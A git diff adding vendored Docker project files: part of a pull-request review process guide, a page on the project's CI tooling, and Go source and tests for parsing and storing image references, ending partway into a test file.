+completeness, validity, and breadth of coverage across all existing and new documentation.
+
+They should ask for any editorial change that makes the documentation more consistent and easier to
+understand.
+
+The docker/docker repository only contains _reference documentation_, all
+"narrative" documentation is kept in a [unified documentation
+repository](https://github.com/docker/docker.github.io). Reviewers must
+therefore verify which parts of the documentation need to be updated. Any
+contribution that may require changing the narrative should get the
+`impact/documentation` label: this is the signal for documentation maintainers
+that a change will likely need to happen on the unified documentation
+repository. When in doubt, it’s better to add the label and leave it to
+documentation maintainers to decide whether it’s ok to skip. In all cases,
+leave a comment to explain what documentation changes you think might be needed.
+
+- If the pull request does not impact the documentation at all, the docs review
+  step is skipped, and the pull request is ready to merge.
+- If the changes in
+  the pull request require changes to the reference documentation (either
+  command-line reference, or API reference), those changes must be included as
+  part of the pull request and will be reviewed now. Keep in mind that the
+  narrative documentation may contain output examples of commands, so may need
+  to be updated as well, in which case the `impact/documentation` label must
+  be applied.
+- If the PR has the `impact/documentation` label, merging is delayed until a
+  documentation maintainer acknowledges that a corresponding documentation PR
+  (or issue) is opened on the documentation repository. Once a documentation
+  maintainer acknowledges the change, she/he will move the PR to `status/4-merge`
+  for a code maintainer to push the green button.
+
+Changes and additions to docs must be reviewed and approved (LGTM'd) by a minimum of two docs
+sub-project maintainers. If the docs change originates with a docs maintainer, only one additional
+LGTM is required (since we assume a docs maintainer approves of their own PR).
+
+Once documentation is approved, a maintainer should make sure to remove this label and
+add the next one.
+
+Possible transitions from this state:
+
+ * Close
+ * `status/1-design-review`: new design concerns are raised
+ * `status/2-code-review`: requires more code changes
+ * `status/4-ready-to-merge`: general case
+
+### Merge - `status/4-ready-to-merge`
+
+Maintainers are expected to merge this pull request as soon as possible. They can ask for a rebase
+or carry the pull request themselves.
+
+Possible transitions from this state:
+
+ * Merge: general case
+ * Close: carry PR
+
+After merging a pull request, the maintainer should consider applying one or multiple impact labels
+to ease future classification:
+
+ * `impact/api` signifies the patch impacted the Engine API
+ * `impact/changelog` signifies the change is significant enough to make it in the changelog
+ * `impact/cli` signifies the patch impacted a CLI command
+ * `impact/dockerfile` signifies the patch impacted the Dockerfile syntax
+ * `impact/deprecation` signifies the patch participates in deprecating an existing feature
+
+### Close
+
+If a pull request is closed it is expected that sufficient justification will be provided. In
+particular, if there are alternative ways of achieving the same net result then those needs to be
+spelled out. If the pull request is trying to solve a use case that is not one that we (as a
+community) want to support then a justification for why should be provided.
+
+The number of maintainers it takes to decide and close a PR is deliberately left unspecified. We
+assume that the group of maintainers is bound by mutual trust and respect, and that opposition from
+any single maintainer should be taken into consideration. Similarly, we expect maintainers to
+justify their reasoning and to accept debating.
+
+## Escalation process
+
+Despite the previously described reviewing process, some PR might not show any progress for various
+reasons:
+
+ - No strong opinion for or against the proposed patch
+ - Debates about the proper way to solve the problem at hand
+ - Lack of consensus
+ - ...
+
+All these will eventually lead to stalled PR, where no apparent progress is made across several
+weeks, or even months.
+
+Maintainers should use their best judgement and apply the `status/needs-attention` label. It must
+be used sparingly, as each PR with such label will be discussed by a group of maintainers during a
+review session. The goal of that session is to agree on one of the following outcomes for the PR:
+
+ * Close, explaining the rationale for not pursuing further
+ * Continue, either by pushing the PR further in the workflow, or by deciding to carry the patch
+   (ideally, a maintainer should be immediately assigned to make sure that the PR keeps continued
+   attention)
+ * Escalate to Solomon by formulating a few specific questions on which his answers will allow
+   maintainers to decide.
+
+## Milestones
+
+Typically, every merged pull request get shipped naturally with the next release cut from the
+`master` branch (either the next minor or major version, as indicated by the
+[`VERSION`](https://github.com/docker/docker/blob/master/VERSION) file at the root of the
+repository). However, the time-based nature of the release process provides no guarantee that a
+given pull request will get merged in time. In other words, all open pull requests are implicitly
+considered part of the next minor or major release milestone, and this won't be materialized on
+GitHub.
+
+A merged pull request must be attached to the milestone corresponding to the release in which it
+will be shipped: this is both useful for tracking, and to help the release manager with the
+changelog generation.
+
+An open pull request may exceptionally get attached to a milestone to express a particular intent to
+get it merged in time for that release. This may for example be the case for an important feature to
+be included in a minor release, or a critical bugfix to be included in a patch release.
+
+Finally, and as documented by the [`PATCH-RELEASES.md`](PATCH-RELEASES.md) process, the existence of
+a milestone is not a guarantee that a release will happen, as some milestones will be created purely
+for the purpose of bookkeeping
diff --git a/vendor/github.com/docker/docker/project/TOOLS.md b/vendor/github.com/docker/docker/project/TOOLS.md
new file mode 100644
index 0000000000..26303c3021
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/TOOLS.md
@@ -0,0 +1,63 @@
+# Tools
+
+This page describes the tools we use and infrastructure that is in place for
+the Docker project.
+
+### CI
+
+The Docker project uses [Jenkins](https://jenkins.dockerproject.org/) as our
+continuous integration server. Each Pull Request to Docker is tested by running the 
+equivalent of `make all`. We chose Jenkins because we can host it ourselves and
+we run Docker in Docker to test.
+
+#### Leeroy
+
+Leeroy is a Go application which integrates Jenkins with 
+GitHub pull requests. Leeroy uses 
+[GitHub hooks](https://developer.github.com/v3/repos/hooks/) 
+to listen for pull request notifications and starts jobs on your Jenkins 
+server.  Using the Jenkins
+[notification plugin][https://wiki.jenkins-ci.org/display/JENKINS/Notification+Plugin],
+Leeroy updates the pull request using GitHub's 
+[status API](https://developer.github.com/v3/repos/statuses/)
+with pending, success, failure, or error statuses.
+
+The leeroy repository is maintained at
+[github.com/docker/leeroy](https://github.com/docker/leeroy).
+
+#### GordonTheTurtle IRC Bot
+
+The GordonTheTurtle IRC Bot lives in the
+[#docker-maintainers](https://botbot.me/freenode/docker-maintainers/) channel
+on Freenode. He is built in Go and is based off the project at
+[github.com/fabioxgn/go-bot](https://github.com/fabioxgn/go-bot). 
+
+His main command is `!rebuild`, which rebuilds a given Pull Request for a repository.
+This command works by integrating with Leroy. He has a few other commands too, such 
+as `!gif` or `!godoc`, but we are always looking for more fun commands to add.
+
+The gordon-bot repository is maintained at
+[github.com/docker/gordon-bot](https://github.com/docker/gordon-bot)
+
+### NSQ
+
+We use [NSQ](https://github.com/bitly/nsq) for various aspects of the project
+infrastructure.
+
+#### Hooks
+
+The hooks project,
+[github.com/crosbymichael/hooks](https://github.com/crosbymichael/hooks),
+is a small Go application that manages web hooks from github, hub.docker.com, or
+other third party services.
+
+It can be used for listening to github webhooks & pushing them to a queue,
+archiving hooks to rethinkdb for processing, and broadcasting hooks to various
+jobs.
+
+#### Docker Master Binaries
+
+One of the things queued from the Hooks are the building of the Master
+Binaries. This happens on every push to the master branch of Docker. The
+repository for this is maintained at
+[github.com/docker/docker-bb](https://github.com/docker/docker-bb).
diff --git a/vendor/github.com/docker/docker/reference/reference.go b/vendor/github.com/docker/docker/reference/reference.go
new file mode 100644
index 0000000000..996fc50704
--- /dev/null
+++ b/vendor/github.com/docker/docker/reference/reference.go
@@ -0,0 +1,216 @@
+package reference
+
+import (
+	"errors"
+	"fmt"
+	"strings"
+
+	"github.com/docker/distribution/digest"
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/image/v1"
+)
+
+const (
+	// DefaultTag defines the default tag used when performing images related actions and no tag or digest is specified
+	DefaultTag = "latest"
+	// DefaultHostname is the default built-in hostname
+	DefaultHostname = "docker.io"
+	// LegacyDefaultHostname is automatically converted to DefaultHostname
+	LegacyDefaultHostname = "index.docker.io"
+	// DefaultRepoPrefix is the prefix used for default repositories in default host
+	DefaultRepoPrefix = "library/"
+)
+
+// Named is an object with a full name
+type Named interface {
+	// Name returns normalized repository name, like "ubuntu".
+	Name() string
+	// String returns full reference, like "ubuntu@sha256:abcdef..."
+	String() string
+	// FullName returns full repository name with hostname, like "docker.io/library/ubuntu"
+	FullName() string
+	// Hostname returns hostname for the reference, like "docker.io"
+	Hostname() string
+	// RemoteName returns the repository component of the full name, like "library/ubuntu"
+	RemoteName() string
+}
+
+// NamedTagged is an object including a name and tag.
+type NamedTagged interface {
+	Named
+	Tag() string
+}
+
+// Canonical reference is an object with a fully unique
+// name including a name with hostname and digest
+type Canonical interface {
+	Named
+	Digest() digest.Digest
+}
+
+// ParseNamed parses s and returns a syntactically valid reference implementing
+// the Named interface. The reference must have a name, otherwise an error is
+// returned.
+// If an error was encountered it is returned, along with a nil Reference.
+func ParseNamed(s string) (Named, error) {
+	named, err := distreference.ParseNamed(s)
+	if err != nil {
+		return nil, fmt.Errorf("Error parsing reference: %q is not a valid repository/tag: %s", s, err)
+	}
+	r, err := WithName(named.Name())
+	if err != nil {
+		return nil, err
+	}
+	if canonical, isCanonical := named.(distreference.Canonical); isCanonical {
+		return WithDigest(r, canonical.Digest())
+	}
+	if tagged, isTagged := named.(distreference.NamedTagged); isTagged {
+		return WithTag(r, tagged.Tag())
+	}
+	return r, nil
+}
+
+// TrimNamed removes any tag or digest from the named reference
+func TrimNamed(ref Named) Named {
+	return &namedRef{distreference.TrimNamed(ref)}
+}
+
+// WithName returns a named object representing the given string. If the input
+// is invalid ErrReferenceInvalidFormat will be returned.
+func WithName(name string) (Named, error) {
+	name, err := normalize(name)
+	if err != nil {
+		return nil, err
+	}
+	if err := validateName(name); err != nil {
+		return nil, err
+	}
+	r, err := distreference.WithName(name)
+	if err != nil {
+		return nil, err
+	}
+	return &namedRef{r}, nil
+}
+
+// WithTag combines the name from "name" and the tag from "tag" to form a
+// reference incorporating both the name and the tag.
+func WithTag(name Named, tag string) (NamedTagged, error) {
+	r, err := distreference.WithTag(name, tag)
+	if err != nil {
+		return nil, err
+	}
+	return &taggedRef{namedRef{r}}, nil
+}
+
+// WithDigest combines the name from "name" and the digest from "digest" to form
+// a reference incorporating both the name and the digest.
+func WithDigest(name Named, digest digest.Digest) (Canonical, error) {
+	r, err := distreference.WithDigest(name, digest)
+	if err != nil {
+		return nil, err
+	}
+	return &canonicalRef{namedRef{r}}, nil
+}
+
+type namedRef struct {
+	distreference.Named
+}
+type taggedRef struct {
+	namedRef
+}
+type canonicalRef struct {
+	namedRef
+}
+
+func (r *namedRef) FullName() string {
+	hostname, remoteName := splitHostname(r.Name())
+	return hostname + "/" + remoteName
+}
+func (r *namedRef) Hostname() string {
+	hostname, _ := splitHostname(r.Name())
+	return hostname
+}
+func (r *namedRef) RemoteName() string {
+	_, remoteName := splitHostname(r.Name())
+	return remoteName
+}
+func (r *taggedRef) Tag() string {
+	return r.namedRef.Named.(distreference.NamedTagged).Tag()
+}
+func (r *canonicalRef) Digest() digest.Digest {
+	return r.namedRef.Named.(distreference.Canonical).Digest()
+}
+
+// WithDefaultTag adds a default tag to a reference if it only has a repo name.
+func WithDefaultTag(ref Named) Named {
+	if IsNameOnly(ref) {
+		ref, _ = WithTag(ref, DefaultTag)
+	}
+	return ref
+}
+
+// IsNameOnly returns true if reference only contains a repo name.
+func IsNameOnly(ref Named) bool {
+	if _, ok := ref.(NamedTagged); ok {
+		return false
+	}
+	if _, ok := ref.(Canonical); ok {
+		return false
+	}
+	return true
+}
+
+// ParseIDOrReference parses string for an image ID or a reference. ID can be
+// without a default prefix.
+func ParseIDOrReference(idOrRef string) (digest.Digest, Named, error) {
+	if err := v1.ValidateID(idOrRef); err == nil {
+		idOrRef = "sha256:" + idOrRef
+	}
+	if dgst, err := digest.ParseDigest(idOrRef); err == nil {
+		return dgst, nil, nil
+	}
+	ref, err := ParseNamed(idOrRef)
+	return "", ref, err
+}
+
+// splitHostname splits a repository name to hostname and remotename string.
+// If no valid hostname is found, the default hostname is used. Repository name
+// needs to be already validated before.
+func splitHostname(name string) (hostname, remoteName string) {
+	i := strings.IndexRune(name, '/')
+	if i == -1 || (!strings.ContainsAny(name[:i], ".:") && name[:i] != "localhost") {
+		hostname, remoteName = DefaultHostname, name
+	} else {
+		hostname, remoteName = name[:i], name[i+1:]
+	}
+	if hostname == LegacyDefaultHostname {
+		hostname = DefaultHostname
+	}
+	if hostname == DefaultHostname && !strings.ContainsRune(remoteName, '/') {
+		remoteName = DefaultRepoPrefix + remoteName
+	}
+	return
+}
+
+// normalize returns a repository name in its normalized form, meaning it
+// will not contain default hostname nor library/ prefix for official images.
+func normalize(name string) (string, error) {
+	host, remoteName := splitHostname(name)
+	if strings.ToLower(remoteName) != remoteName {
+		return "", errors.New("invalid reference format: repository name must be lowercase")
+	}
+	if host == DefaultHostname {
+		if strings.HasPrefix(remoteName, DefaultRepoPrefix) {
+			return strings.TrimPrefix(remoteName, DefaultRepoPrefix), nil
+		}
+		return remoteName, nil
+	}
+	return name, nil
+}
+
+func validateName(name string) error {
+	if err := v1.ValidateID(name); err == nil {
+		return fmt.Errorf("Invalid repository name (%s), cannot specify 64-byte hexadecimal strings", name)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/reference/reference_test.go b/vendor/github.com/docker/docker/reference/reference_test.go
new file mode 100644
index 0000000000..ff35ba3da2
--- /dev/null
+++ b/vendor/github.com/docker/docker/reference/reference_test.go
@@ -0,0 +1,275 @@
+package reference
+
+import (
+	"testing"
+
+	"github.com/docker/distribution/digest"
+)
+
+func TestValidateReferenceName(t *testing.T) {
+	validRepoNames := []string{
+		"docker/docker",
+		"library/debian",
+		"debian",
+		"docker.io/docker/docker",
+		"docker.io/library/debian",
+		"docker.io/debian",
+		"index.docker.io/docker/docker",
+		"index.docker.io/library/debian",
+		"index.docker.io/debian",
+		"127.0.0.1:5000/docker/docker",
+		"127.0.0.1:5000/library/debian",
+		"127.0.0.1:5000/debian",
+		"thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev",
+	}
+	invalidRepoNames := []string{
+		"https://github.com/docker/docker",
+		"docker/Docker",
+		"-docker",
+		"-docker/docker",
+		"-docker.io/docker/docker",
+		"docker///docker",
+		"docker.io/docker/Docker",
+		"docker.io/docker///docker",
+		"1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
+		"docker.io/1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
+	}
+
+	for _, name := range invalidRepoNames {
+		_, err := ParseNamed(name)
+		if err == nil {
+			t.Fatalf("Expected invalid repo name for %q", name)
+		}
+	}
+
+	for _, name := range validRepoNames {
+		_, err := ParseNamed(name)
+		if err != nil {
+			t.Fatalf("Error parsing repo name %s, got: %q", name, err)
+		}
+	}
+}
+
+func TestValidateRemoteName(t *testing.T) {
+	validRepositoryNames := []string{
+		// Sanity check.
+		"docker/docker",
+
+		// Allow 64-character non-hexadecimal names (hexadecimal names are forbidden).
+		"thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev",
+
+		// Allow embedded hyphens.
+		"docker-rules/docker",
+
+		// Allow multiple hyphens as well.
+		"docker---rules/docker",
+
+		//Username doc and image name docker being tested.
+		"doc/docker",
+
+		// single character names are now allowed.
+		"d/docker",
+		"jess/t",
+
+		// Consecutive underscores.
+		"dock__er/docker",
+	}
+	for _, repositoryName := range validRepositoryNames {
+		_, err := ParseNamed(repositoryName)
+		if err != nil {
+			t.Errorf("Repository name should be valid: %v. Error: %v", repositoryName, err)
+		}
+	}
+
+	invalidRepositoryNames := []string{
+		// Disallow capital letters.
+		"docker/Docker",
+
+		// Only allow one slash.
+		"docker///docker",
+
+		// Disallow 64-character hexadecimal.
+		"1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a",
+
+		// Disallow leading and trailing hyphens in namespace.
+		"-docker/docker",
+		"docker-/docker",
+		"-docker-/docker",
+
+		// Don't allow underscores everywhere (as opposed to hyphens).
+		"____/____",
+
+		"_docker/_docker",
+
+		// Disallow consecutive periods.
+		"dock..er/docker",
+		"dock_.er/docker",
+		"dock-.er/docker",
+
+		// No repository.
+		"docker/",
+
+		//namespace too long
+		"this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255_this_is_not_a_valid_namespace_because_its_lenth_is_greater_than_255/docker",
+	}
+	for _, repositoryName := range invalidRepositoryNames {
+		if _, err := ParseNamed(repositoryName); err == nil {
+			t.Errorf("Repository name should be invalid: %v", repositoryName)
+		}
+	}
+}
+
+func TestParseRepositoryInfo(t *testing.T) {
+	type tcase struct {
+		RemoteName, NormalizedName, FullName, AmbiguousName, Hostname string
+	}
+
+	tcases := []tcase{
+		{
+			RemoteName:     "fooo/bar",
+			NormalizedName: "fooo/bar",
+			FullName:       "docker.io/fooo/bar",
+			AmbiguousName:  "index.docker.io/fooo/bar",
+			Hostname:       "docker.io",
+		},
+		{
+			RemoteName:     "library/ubuntu",
+			NormalizedName: "ubuntu",
+			FullName:       "docker.io/library/ubuntu",
+			AmbiguousName:  "library/ubuntu",
+			Hostname:       "docker.io",
+		},
+		{
+			RemoteName:     "nonlibrary/ubuntu",
+			NormalizedName: "nonlibrary/ubuntu",
+			FullName:       "docker.io/nonlibrary/ubuntu",
+			AmbiguousName:  "",
+			Hostname:       "docker.io",
+		},
+		{
+			RemoteName:     "other/library",
+			NormalizedName: "other/library",
+			FullName:       "docker.io/other/library",
+			AmbiguousName:  "",
+			Hostname:       "docker.io",
+		},
+		{
+			RemoteName:     "private/moonbase",
+			NormalizedName: "127.0.0.1:8000/private/moonbase",
+			FullName:       "127.0.0.1:8000/private/moonbase",
+			AmbiguousName:  "",
+			Hostname:       "127.0.0.1:8000",
+		},
+		{
+			RemoteName:     "privatebase",
+			NormalizedName: "127.0.0.1:8000/privatebase",
+			FullName:       "127.0.0.1:8000/privatebase",
+			AmbiguousName:  "",
+			Hostname:       "127.0.0.1:8000",
+		},
+		{
+			RemoteName:     "private/moonbase",
+			NormalizedName: "example.com/private/moonbase",
+			FullName:       "example.com/private/moonbase",
+			AmbiguousName:  "",
+			Hostname:       "example.com",
+		},
+		{
+			RemoteName:     "privatebase",
+			NormalizedName: "example.com/privatebase",
+			FullName:       "example.com/privatebase",
+			AmbiguousName:  "",
+			Hostname:       "example.com",
+		},
+		{
+			RemoteName:     "private/moonbase",
+			NormalizedName: "example.com:8000/private/moonbase",
+			FullName:       "example.com:8000/private/moonbase",
+			AmbiguousName:  "",
+			Hostname:       "example.com:8000",
+		},
+		{
+			RemoteName:     "privatebasee",
+			NormalizedName: "example.com:8000/privatebasee",
+			FullName:       "example.com:8000/privatebasee",
+			AmbiguousName:  "",
+			Hostname:       "example.com:8000",
+		},
+		{
+			RemoteName:     "library/ubuntu-12.04-base",
+			NormalizedName: "ubuntu-12.04-base",
+			FullName:       "docker.io/library/ubuntu-12.04-base",
+			AmbiguousName:  "index.docker.io/library/ubuntu-12.04-base",
+			Hostname:       "docker.io",
+		},
+	}
+
+	for _, tcase := range tcases {
+		refStrings := []string{tcase.NormalizedName, tcase.FullName}
+		if tcase.AmbiguousName != "" {
+			refStrings = append(refStrings, tcase.AmbiguousName)
+		}
+
+		var refs []Named
+		for _, r := range refStrings {
+			named, err := ParseNamed(r)
+			if err != nil {
+				t.Fatal(err)
+			}
+			refs = append(refs, named)
+			named, err = WithName(r)
+			if err != nil {
+				t.Fatal(err)
+			}
+			refs = append(refs, named)
+		}
+
+		for _, r := range refs {
+			if expected, actual := tcase.NormalizedName, r.Name(); expected != actual {
+				t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual)
+			}
+			if expected, actual := tcase.FullName, r.FullName(); expected != actual {
+				t.Fatalf("Invalid normalized reference for %q. Expected %q, got %q", r, expected, actual)
+			}
+			if expected, actual := tcase.Hostname, r.Hostname(); expected != actual {
+				t.Fatalf("Invalid hostname for %q. Expected %q, got %q", r, expected, actual)
+			}
+			if expected, actual := tcase.RemoteName, r.RemoteName(); expected != actual {
+				t.Fatalf("Invalid remoteName for %q. Expected %q, got %q", r, expected, actual)
+			}
+
+		}
+	}
+}
+
+func TestParseReferenceWithTagAndDigest(t *testing.T) {
+	ref, err := ParseNamed("busybox:latest@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, isTagged := ref.(NamedTagged); isTagged {
+		t.Fatalf("Reference from %q should not support tag", ref)
+	}
+	if _, isCanonical := ref.(Canonical); !isCanonical {
+		t.Fatalf("Reference from %q should not support digest", ref)
+	}
+	if expected, actual := "busybox@sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa", ref.String(); actual != expected {
+		t.Fatalf("Invalid parsed reference for %q: expected %q, got %q", ref, expected, actual)
+	}
+}
+
+func TestInvalidReferenceComponents(t *testing.T) {
+	if _, err := WithName("-foo"); err == nil {
+		t.Fatal("Expected WithName to detect invalid name")
+	}
+	ref, err := WithName("busybox")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := WithTag(ref, "-foo"); err == nil {
+		t.Fatal("Expected WithName to detect invalid tag")
+	}
+	if _, err := WithDigest(ref, digest.Digest("foo")); err == nil {
+		t.Fatal("Expected WithName to detect invalid digest")
+	}
+}
diff --git a/vendor/github.com/docker/docker/reference/store.go b/vendor/github.com/docker/docker/reference/store.go
new file mode 100644
index 0000000000..71ca236c9c
--- /dev/null
+++ b/vendor/github.com/docker/docker/reference/store.go
@@ -0,0 +1,286 @@
+package reference
+
+import (
+	"encoding/json"
+	"errors"
+	"fmt"
+	"os"
+	"path/filepath"
+	"sort"
+	"sync"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+var (
+	// ErrDoesNotExist is returned if a reference is not found in the
+	// store.
+	ErrDoesNotExist = errors.New("reference does not exist")
+)
+
+// An Association is a tuple associating a reference with an image ID.
+type Association struct {
+	Ref Named
+	ID  digest.Digest
+}
+
+// Store provides the set of methods which can operate on a tag store.
+type Store interface {
+	References(id digest.Digest) []Named
+	ReferencesByName(ref Named) []Association
+	AddTag(ref Named, id digest.Digest, force bool) error
+	AddDigest(ref Canonical, id digest.Digest, force bool) error
+	Delete(ref Named) (bool, error)
+	Get(ref Named) (digest.Digest, error)
+}
+
+type store struct {
+	mu sync.RWMutex
+	// jsonPath is the path to the file where the serialized tag data is
+	// stored.
+	jsonPath string
+	// Repositories is a map of repositories, indexed by name.
+	Repositories map[string]repository
+	// referencesByIDCache is a cache of references indexed by ID, to speed
+	// up References.
+	referencesByIDCache map[digest.Digest]map[string]Named
+}
+
+// Repository maps tags to digests. The key is a stringified Reference,
+// including the repository name.
+type repository map[string]digest.Digest
+
+type lexicalRefs []Named
+
+func (a lexicalRefs) Len() int           { return len(a) }
+func (a lexicalRefs) Swap(i, j int)      { a[i], a[j] = a[j], a[i] }
+func (a lexicalRefs) Less(i, j int) bool { return a[i].String() < a[j].String() }
+
+type lexicalAssociations []Association
+
+func (a lexicalAssociations) Len() int           { return len(a) }
+func (a lexicalAssociations) Swap(i, j int)      { a[i], a[j] = a[j], a[i] }
+func (a lexicalAssociations) Less(i, j int) bool { return a[i].Ref.String() < a[j].Ref.String() }
+
+// NewReferenceStore creates a new reference store, tied to a file path where
+// the set of references are serialized in JSON format.
+func NewReferenceStore(jsonPath string) (Store, error) {
+	abspath, err := filepath.Abs(jsonPath)
+	if err != nil {
+		return nil, err
+	}
+
+	store := &store{
+		jsonPath:            abspath,
+		Repositories:        make(map[string]repository),
+		referencesByIDCache: make(map[digest.Digest]map[string]Named),
+	}
+	// Load the json file if it exists, otherwise create it.
+	if err := store.reload(); os.IsNotExist(err) {
+		if err := store.save(); err != nil {
+			return nil, err
+		}
+	} else if err != nil {
+		return nil, err
+	}
+	return store, nil
+}
+
+// AddTag adds a tag reference to the store. If force is set to true, existing
+// references can be overwritten. This only works for tags, not digests.
+func (store *store) AddTag(ref Named, id digest.Digest, force bool) error {
+	if _, isCanonical := ref.(Canonical); isCanonical {
+		return errors.New("refusing to create a tag with a digest reference")
+	}
+	return store.addReference(WithDefaultTag(ref), id, force)
+}
+
+// AddDigest adds a digest reference to the store.
+func (store *store) AddDigest(ref Canonical, id digest.Digest, force bool) error {
+	return store.addReference(ref, id, force)
+}
+
+func (store *store) addReference(ref Named, id digest.Digest, force bool) error {
+	if ref.Name() == string(digest.Canonical) {
+		return errors.New("refusing to create an ambiguous tag using digest algorithm as name")
+	}
+
+	store.mu.Lock()
+	defer store.mu.Unlock()
+
+	repository, exists := store.Repositories[ref.Name()]
+	if !exists || repository == nil {
+		repository = make(map[string]digest.Digest)
+		store.Repositories[ref.Name()] = repository
+	}
+
+	refStr := ref.String()
+	oldID, exists := repository[refStr]
+
+	if exists {
+		// force only works for tags
+		if digested, isDigest := ref.(Canonical); isDigest {
+			return fmt.Errorf("Cannot overwrite digest %s", digested.Digest().String())
+		}
+
+		if !force {
+			return fmt.Errorf("Conflict: Tag %s is already set to image %s, if you want to replace it, please use -f option", ref.String(), oldID.String())
+		}
+
+		if store.referencesByIDCache[oldID] != nil {
+			delete(store.referencesByIDCache[oldID], refStr)
+			if len(store.referencesByIDCache[oldID]) == 0 {
+				delete(store.referencesByIDCache, oldID)
+			}
+		}
+	}
+
+	repository[refStr] = id
+	if store.referencesByIDCache[id] == nil {
+		store.referencesByIDCache[id] = make(map[string]Named)
+	}
+	store.referencesByIDCache[id][refStr] = ref
+
+	return store.save()
+}
+
+// Delete deletes a reference from the store. It returns true if a deletion
+// happened, or false otherwise.
+func (store *store) Delete(ref Named) (bool, error) {
+	ref = WithDefaultTag(ref)
+
+	store.mu.Lock()
+	defer store.mu.Unlock()
+
+	repoName := ref.Name()
+
+	repository, exists := store.Repositories[repoName]
+	if !exists {
+		return false, ErrDoesNotExist
+	}
+
+	refStr := ref.String()
+	if id, exists := repository[refStr]; exists {
+		delete(repository, refStr)
+		if len(repository) == 0 {
+			delete(store.Repositories, repoName)
+		}
+		if store.referencesByIDCache[id] != nil {
+			delete(store.referencesByIDCache[id], refStr)
+			if len(store.referencesByIDCache[id]) == 0 {
+				delete(store.referencesByIDCache, id)
+			}
+		}
+		return true, store.save()
+	}
+
+	return false, ErrDoesNotExist
+}
+
+// Get retrieves an item from the store by reference
+func (store *store) Get(ref Named) (digest.Digest, error) {
+	ref = WithDefaultTag(ref)
+
+	store.mu.RLock()
+	defer store.mu.RUnlock()
+
+	repository, exists := store.Repositories[ref.Name()]
+	if !exists || repository == nil {
+		return "", ErrDoesNotExist
+	}
+
+	id, exists := repository[ref.String()]
+	if !exists {
+		return "", ErrDoesNotExist
+	}
+
+	return id, nil
+}
+
+// References returns a slice of references to the given ID. The slice
+// will be nil if there are no references to this ID.
+func (store *store) References(id digest.Digest) []Named {
+	store.mu.RLock()
+	defer store.mu.RUnlock()
+
+	// Convert the internal map to an array for two reasons:
+	// 1) We must not return a mutable
+	// 2) It would be ugly to expose the extraneous map keys to callers.
+
+	var references []Named
+	for _, ref := range store.referencesByIDCache[id] {
+		references = append(references, ref)
+	}
+
+	sort.Sort(lexicalRefs(references))
+
+	return references
+}
+
+// ReferencesByName returns the references for a given repository name.
+// If there are no references known for this repository name,
+// ReferencesByName returns nil.
+func (store *store) ReferencesByName(ref Named) []Association {
+	store.mu.RLock()
+	defer store.mu.RUnlock()
+
+	repository, exists := store.Repositories[ref.Name()]
+	if !exists {
+		return nil
+	}
+
+	var associations []Association
+	for refStr, refID := range repository {
+		ref, err := ParseNamed(refStr)
+		if err != nil {
+			// Should never happen
+			return nil
+		}
+		associations = append(associations,
+			Association{
+				Ref: ref,
+				ID:  refID,
+			})
+	}
+
+	sort.Sort(lexicalAssociations(associations))
+
+	return associations
+}
+
+func (store *store) save() error {
+	// Store the json
+	jsonData, err := json.Marshal(store)
+	if err != nil {
+		return err
+	}
+	return ioutils.AtomicWriteFile(store.jsonPath, jsonData, 0600)
+}
+
+func (store *store) reload() error {
+	f, err := os.Open(store.jsonPath)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+	if err := json.NewDecoder(f).Decode(&store); err != nil {
+		return err
+	}
+
+	for _, repository := range store.Repositories {
+		for refStr, refID := range repository {
+			ref, err := ParseNamed(refStr)
+			if err != nil {
+				// Should never happen
+				continue
+			}
+			if store.referencesByIDCache[refID] == nil {
+				store.referencesByIDCache[refID] = make(map[string]Named)
+			}
+			store.referencesByIDCache[refID][refStr] = ref
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/reference/store_test.go b/vendor/github.com/docker/docker/reference/store_test.go
new file mode 100644
index 0000000000..dd1d253d8e
--- /dev/null
+++ b/vendor/github.com/docker/docker/reference/store_test.go
@@ -0,0 +1,356 @@
+package reference
+
+import (
+	"bytes"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"github.com/docker/distribution/digest"
+)
+
+var (
+	saveLoadTestCases = map[string]digest.Digest{
+		"registry:5000/foobar:HEAD":                                                        "sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6",
+		"registry:5000/foobar:alternate":                                                   "sha256:ae300ebc4a4f00693702cfb0a5e0b7bc527b353828dc86ad09fb95c8a681b793",
+		"registry:5000/foobar:latest":                                                      "sha256:6153498b9ac00968d71b66cca4eac37e990b5f9eb50c26877eb8799c8847451b",
+		"registry:5000/foobar:master":                                                      "sha256:6c9917af4c4e05001b346421959d7ea81b6dc9d25718466a37a6add865dfd7fc",
+		"jess/hollywood:latest":                                                            "sha256:ae7a5519a0a55a2d4ef20ddcbd5d0ca0888a1f7ab806acc8e2a27baf46f529fe",
+		"registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6": "sha256:24126a56805beb9711be5f4590cc2eb55ab8d4a85ebd618eed72bb19fc50631c",
+		"busybox:latest": "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+	}
+
